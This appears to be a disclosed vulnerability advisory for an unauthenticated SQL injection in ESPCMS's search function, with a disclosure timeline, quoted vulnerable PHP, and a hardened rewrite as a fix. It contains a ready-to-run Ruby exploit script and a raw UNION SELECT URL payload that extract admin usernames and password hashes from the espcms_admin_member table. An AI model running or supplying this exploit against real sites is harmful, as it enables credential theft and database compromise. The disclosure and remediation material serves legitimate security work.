2013-06-25: Details reported to the vendor; awaiting the vendor's handling
2013-06-25: Vendor confirmed; details disclosed to the vendor only
2013-06-28: Details opened to third-party security partners
2013-08-19: Details disclosed to core white hats and experts in the relevant fields
2013-08-29: Details disclosed to regular white hats
2013-09-08: Details disclosed to intern white hats
2013-09-23: Details disclosed to the public
No authentication required; data can be dumped directly
The root cause is the same as the SQL injection in the wap module: variables are read from $_SERVER['QUERY_STRING'] instead of the filtered request arrays, so the input filtering is bypassed. In the in_result function of /interface/search.php:
function in_result() {
    // ... (omitted)
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    // ... (omitted)
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // $value is never escaped: it comes from QUERY_STRING, not from the filtered $_GET
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    // ... (omitted)
}
PoC:
require "net/http"
require "uri"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc = <<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage = <<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "[*]send request..."
  url = "http://#{$host}:#{$port}#{$path}index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23
Fix suggestion: put the filtering at the mysql_query entry point rather than at the program entry point.
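An added illustration of that suggestion, not ESPCMS code: the vulnerable shape of the attr loop from in_result beside a rewrite that filters at the query boundary. The PDO handle, the espcms_ table names and the function names are assumptions for the illustration.

```php
<?php
// Added example (not ESPCMS code). $pdo and the table names are assumptions.

// Vulnerable shape: values come from parse_str(QUERY_STRING), so filtering applied to
// $_GET never sees them, and $value is concatenated straight into the WHERE clause.
function build_where_vulnerable(string $query_string): string {
    parse_str(html_entity_decode($query_string), $output);
    $where = '';
    if (!empty($output['attr']) && is_array($output['attr'])) {
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                $where .= ' AND b.' . $key . "='" . $value . "'";  // injection point
            }
        }
    }
    return $where;
}

// Hardened shape: the filter sits where the SQL is built, so it does not matter which
// superglobal the data came from.
//  - $key is a column name and cannot be bound as a parameter, so it is restricted to a
//    strict identifier pattern and checked against the attribute table with a prepared query;
//  - $value is never concatenated; it is returned as a bound parameter.
function build_where_hardened(PDO $pdo, array $attr): array {
    $where  = '';
    $params = [];
    $check  = $pdo->prepare(
        'SELECT COUNT(*) FROM espcms_model_att WHERE isclass=1 AND attrname=?'
    );
    foreach ($attr as $key => $value) {
        if ($value === '' || $value === null) {
            continue;
        }
        if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $key)) {
            continue;  // not a plausible column identifier
        }
        $check->execute([$key]);
        if ((int) $check->fetchColumn() === 0) {
            continue;  // not a known attribute column
        }
        $where   .= ' AND b.`' . $key . '`=?';
        $params[] = $value;
    }
    return [$where, $params];
}

// Usage (assumed $pdo): the value reaches MySQL only as a bound parameter.
// [$where, $params] = build_where_hardened($pdo, $_GET['attr'] ?? []);
// $stmt = $pdo->prepare('SELECT b.*,a.* FROM espcms_document AS a LEFT JOIN '
//     . 'espcms_document_attr AS b ON a.did=b.did WHERE 1=1' . $where . ' LIMIT 0,15');
// $stmt->execute($params);
```

Reading attr from $_GET rather than re-parsing QUERY_STRING also keeps the framework's existing input filtering in the path, but the binding at the query boundary is what closes the hole regardless of the input source.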
Severity level: High
Vulnerability Rank: 10
Confirmation time: 2013-06-25 18:14
Thanks!
None yet